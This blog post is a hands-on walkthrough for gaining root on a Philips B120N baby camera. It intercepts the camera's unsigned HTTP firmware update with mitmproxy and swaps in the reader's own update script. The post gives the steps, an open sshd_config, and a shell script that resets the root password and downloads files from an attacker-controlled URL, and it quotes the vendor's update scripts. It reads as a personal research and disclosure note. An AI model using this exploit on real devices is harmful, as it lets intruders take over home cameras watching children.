Gaining Root Access on Philips B120N Babycam

Update, I have a new philips babycam, and rooted it again, so I added some more info.

This is an older post, and after having contacted philips, they told me they had received a report of this issue months prior to my report. In the new firmware these problems don’t exist anymore, this doesn’t mean that the b120n is flaweless, because when you reset the babycam it reverts back to the old firmware, and you can root it.

I wanted to try rooting my B120N cam, and tried to follow Paul Prices Owning Philips In.Sight IP Cameras But unfortunately Philips decided to close all interesting ports in the firmware version my cam was running.

I did find a way to gain root access, and I wanted to add a recording of the process so you can try it yourself..

I setup my linux box as ‘router’ with mitmproxy and a hotspot, connecting my ethernet port and directing traffic trough hotspot -> mitmproxy -> internet
In short the steps you need to do:

  1. Install mitmproxy on your pc / notebook (plenty of good tutorials available online), to be able to capture traffic and alter responses
  2. Setup a hotspot, where you will connect your phone and camera
  3. connect your phone, run the insight app, and configure your cam / scan the qrcode
  4. Now your camera will connect to the wifi, once the insight app asks you if you want to ipgrade press i in mitmproxy and set the filter to .* to capture all traffic and halt on every request
  5. click yes on the upgrade prompt in the insight app
  6. press ‘a’ key to allow the requests per line, untill you reach the upgrade_fw.sh line (don’t press a on that line, we want to modify this request)
  7. hit enter on the upgrade_fw.sh and press ‘e’ to edit the request
  8. there will be an option to edit the url (I think it’s ‘u’) then point the request url to ‘http://yoururl.com/upgrade_fw.sh) where you set your own shellscript and ssh_config gile) and press enter, and hit ‘a’ to allow the request to complete.
  9. Your now have rootaccess to your camera.

    below you can find a sample upgrade_fw.sh and sshd_config you can use to complete the rooting.

For this setup I used mitmproxy to capture the traffic from the B120N when it was freshly connected to my wifi network.

When opening the mobile application I immediately got a message to update my cams firmware, when I hit update I saw multiple requests passing through:

http://philips.iv-cdn.com/upgrade_fw.sh

So I noticed, no https request, ok.. makes my life a little easier.

To get root access I needed to replace the current sshd_config with my own, to open up an ssh port.

Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

# The default requires explicit activation of protocol 1
#Protocol 2

# Logging
# obsoletes QuietMode and FascistLogging
#SyslogFacility AUTH
#LogLevel INFO
HostKey /etc/ssh_host_rsa_key
HostKey /etc/ssh_host_dsa_key
# Authentication:

#LoginGraceTime 2m
#PermitRootLogin yes
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

RSAAuthentication yes
PubkeyAuthentication yes

AuthorizedKeysFile .ssh/authorized_keys
#RhostsRSAAuthentication no
#HostbasedAuthentication no

PasswordAuthentication yes
#PermitEmptyPasswords yes
#AllowUsers thomas
# Change to no to disable s/key passwords
#ChallengeResponseAuthentication yes

#UsePAM no


# override default of no subsystems
#Subsystem sftp /usr/libexec/sftp-server

 

 

I captured the request for upgrade_fw.sh and redirected it to my own sh file, where I reset the password of root (yes root user is downloading the updates, and no, there is no check on validity of the file or origin with hashing) and copy my sshd_config to the system, to open up port 22

echo -e "newrootpass\nnewrootpass" | passwd root

#Now load your own sshd_config to open up a port
wget  http://myurl.com/sshd_config  -O /tmp/sshd_config

mv -f /tmp/sshd_config /etc/sshd_config
sync
reboot

And you are in 🙂

Some more digging

Excerpt from file source code:

#!/bin/bash

set -eux

CDN_URL="http://philips.iv-cdn.com"
VS_PACKAGE="ivideon-server.tgz"
FW_UPDATES_PACKAGE="fw_updates.tgz"
IVIDEON_DIR="/opt/ivideon"
IVIDEON_TMP_DIR="${IVIDEON_DIR}/tmp"
IVIDEON_ENV="/etc/ivideon.env"
REBOOT_TOOL="/opt/ivideon/videoserverd/tools/reboot.sh"
UPGRADE_LOG_FILE="/mnt/adc/ivideon_upgrade.log"
IVIDEON_LAST_UPGRADE_DEBUG_LOG="/mnt/adc/ivideon_last_upgrade_debug.log"
VIDEOSERVERD="/opt/ivideon/videoserverd/videoserverd"

main_impl() {
    if [[ -e "${IVIDEON_ENV}" ]]; then
        . "${IVIDEON_ENV}"
    fi

    rotate_log 2048
    local version_tag="${1-release}"
    local vs_version=$("${VIDEOSERVERD}" -v)

    log_message "Upgrade FW from ${vs_version} to '${version_tag}'\n"

    case "${version_tag}" in
        latest|alpha|beta|release|dev|3.3.28|3.4.0)
            ;;
        ssh-fix)
            wget http://philips.iv-cdn.com/conf/update.sh -O /tmp/update.sh
            sh /tmp/update.sh
            touch /mnt/adc/.ssh_updated
            sync
            reboot
            ;;
        *)
            version_tag=release
            ;;
    esac

    log_message "Effective FW version tag: ${version_tag}.\n"

    cd /tmp
    case "${IVIDEON_CAMERA_TAG-}" in
        m115|m120|b120)
            download_and_check_md5 "${IVIDEON_CAMERA_TAG}/ivideon-server_${version_tag}_philips-m120" "${VS_PACKAGE}" || return 1
            download_and_check_md5 "${IVIDEON_CAMERA_TAG}/fw_updates_${version_tag}" "${FW_UPDATES_PACKAGE}" || return 1
            mv_files_to_ivideon_dir "${FW_UPDATES_PACKAGE}" "${VS_PACKAGE}" || return 1
            ;;
        *)
            download_and_check_md5 "ivideon-server_${version_tag}_philips-m120" "${VS_PACKAGE}" || return 1
            mv_files_to_ivideon_dir "${VS_PACKAGE}" || return 1
            ;;
    esac
}

main "[email protected]"

Looking at the highlighted part, I see some files are being downloaded, looks like camera firmware & ivideon server code. Always nice to browse and look around 🙂

http://philips.iv-cdn.com/b120/fw_updates_release.tar.gz
http://philips.iv-cdn.com/b120/ivideon-server_release_philips-m120.tar.gz

This update script is being downloaded, and runs:

#!/bin/sh

set -e

mkdir -p /tmp/conf

cp /etc/shadow /tmp/conf/
cp /etc/inittab /tmp/conf
cp /etc/sshd_config /tmp/conf/

wget  http://philips.iv-cdn.com/conf/inittab -O /tmp/inittab
wget  http://philips.iv-cdn.com/conf/shadow -O /tmp/shadow
wget  http://philips.iv-cdn.com/conf/sshd_config  -O /tmp/sshd_config
wget  http://philips.iv-cdn.com/conf/additional_vs_info.sh  -O /opt/ivideon/videoserverd/tools/additional_vs_info.sh

chmod +x /opt/ivideon/videoserverd/tools/additional_vs_info.sh

mv -f /tmp/inittab /etc/inittab

mv -f /tmp/shadow /etc/shadow && chmod 600 /etc/shadow
chown 0:0 /etc/shadow

mv -f /tmp/sshd_config /etc/sshd_config

 

 

Leave a Reply

Your email address will not be published.